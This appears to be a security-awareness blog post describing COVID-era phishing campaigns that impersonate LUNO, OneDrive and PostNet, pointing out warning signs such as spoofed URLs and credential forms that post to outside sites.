There are still no indications of any slowdown among hackers attempting to compromise organisations’ emails through their crafted campaigns that take advantage of both national and international affairs associated with the Corona virus pandemic and the resulting lockdown restrictions around the world.
You might well be asking yourself the following questions:
Why bother continuing as a hacker when everyone is experiencing difficulties in life due to the current pandemic circumstances? and,
How many individuals are actually falling for these campaigns for them to be reasonably profitable to the hackers?
The answers to these two questions are simple:
• It typically only takes one point of compromise (usually via an individual) within an organisation for hackers to start taking advantage.
• Persistence in this dodgy industry usually pays off.
• Information is a source of learning and knowledge can become power.
“He who is prudent and lies in wait for an enemy who is not, will be victorious.”
― Sun Tzu, The Art of War
LUNO
Cryptocurrencies and online trading have made waves in recent years and grown drastically in popularity. Many people have invested in these money-making platforms and generated huge profits, seemingly overnight, with a bit of research and some money to spare.
Naturally, it hasn’t taken long for threat actors to recognise the potential profits to be made by compromising crypto and trading accounts, especially considering the user base now extending beyond professionals to the average ‘Jill & Joe Soaps’. This consideration alone means that there are people out there who use these platforms without fully understanding the systems and how they operate. The potential risks associated with owning an account, creating room for error or potential manipulation are also not well known.
The image below depicts an email notification from LUNO, a cryptocurrency trading platform, advising that incoming funds are being held due to an issue. The recipient is recommended to ‘kindly click here to resolve the issue’ and is redirected to an external website.
The website visited when getting redirected looks virtually identical to the actual LUNO login page. Many would naturally expect a login page as the first step in accessing their account to authorise a payment, making it even more credible to the point that errors or slight inconsistencies would be ignored.
Comparing the fake LUNO login page (email linked redirect) against the authentic page shows how similar the duplicate and fake website is.
Figure 1: Faked LUNO Login Page
- The URL (web address) does not contain the LUNO domain, luno.com.
- The Email, Password and Mobile Number fields are immediately visible.
Figure 2: Legitimate LUNO Login Page
- The URL (web address) of the LUNO domain, luno.com is provided.
- Only the email field is immediately visible.
They certainly both looked the same at first glance. The biggest indicator of it being fake is the URL or web address, which should always point to the actual domain for the organisation. Domains are unique and can only be managed by the organisation that owns it. A quick Google search will easily help identify the authenticity of spoofed or suspicious websites like these.
One needs to be very careful of these kinds of scams as your crypto wallet can be drained in seconds with an added consequence of any other linked bank accounts.
Shared Marketing Documents
As is very common nowadays, documents are constantly shared via email or online platforms like Dropbox, OneDrive, SharePoint, and many others, depending on the confidentiality or size (in MB) of the attachments.
PDFs by design allow encryption and the embedding of digital signatures, securing the document content from unauthorised eyes, or having others edit it. It’s concerning when users share PDF files using external links instead of just attaching them to the actual email and this should immediately raise a flag of suspicion.
The following is a perfect example of exactly this, i.e. an email containing an external link to a PDF document. Another suspicious flag is in that the contents or purpose of the document are not specified.
The external link, supposedly to the PDF document, navigates to a website landing page that provides yet another link to the document. This is intentional as it introduces multiple layers of navigation in hopes that email filters are unable to resolve and scan all the layers for suspicious content. The URL (web address) needs to be given special attention.
Moving forward, the next navigational layer presents a OneDrive login page. Unfortunately, this is not the actual OneDrive login page looking at the URL and the intentional request to continue allowing use of various email accounts.
Basically, it is a clear phishing attempt to trick the visitor into providing their email credentials which are likely to be associated with numerous services. One needs to guard personal and business accounts like a state secret as it is essentially your whole life that becomes digitised – the past, present and future.
SA Post Office/Postnet
South Africans are likely by now to be aware of the court case raised by the South African Post Office to block courier companies from delivering packages weighing 1kg and less.
It clearly hasn’t taken long for this information to spread as we’ve recently started seeing an increase in phishing campaigns capitalising on the uncertainty of the situation that this court case causes, even though it has yet to be finalised.
In one such example there is an email notifying, in this particular case a business, of an unsuccessful delivery that took place. The email clearly states the incident and action to be taken with an attached PDF document providing more details. The email also claims to be from a dispatch supervisor, adding a false sense of legitimacy.
Upon opening the PDF, one is met with a similar message and link to print some label required for collection. On a sidenote, why not just include the label in the email or attachment… It is still not immediately suspicious yet though.
On further navigation, after clicking the link to ‘print’, one is presented with a PostNet landing page requesting credentials to access the shipment tracking.
Here’s where the red flags start to appear. Instead of printing, you are navigated to a website that looks like PostNet’s shipment tracking landing page, but the URL gives away that this is in fact NOT the case.
When inspected, none of the links on the website work and the only possible option is to enter an email address and password, but there’s no way to create an account. This should be enough to make any user turn away from accessing the supposed shipment tracking service.
Diving a bit deeper using the browser’s built-in inspect tool to investigate the hidden coding and revealed something else that was interesting.
A POST* command was found that points to yet another external website, still not anything relating to the actual Post Office or PostNet.
*POST command – In computing, POST is a request method supported by HTTP used by the World Wide Web. By design, the POST request method requests that a web server accepts the data enclosed in the body of the request message, most likely for storing it. This is often used when uploading a file or when submitting a completed web form. – Wikipedia
This POST command is a clear indication of the intention to steal credentials, aka phishing. Any email/password combination entered will be submitted to the external website and controlled by the hacker who crafted the campaign. This is yet another example of the craftiness of hackers and the evasive techniques used to bypass detection systems.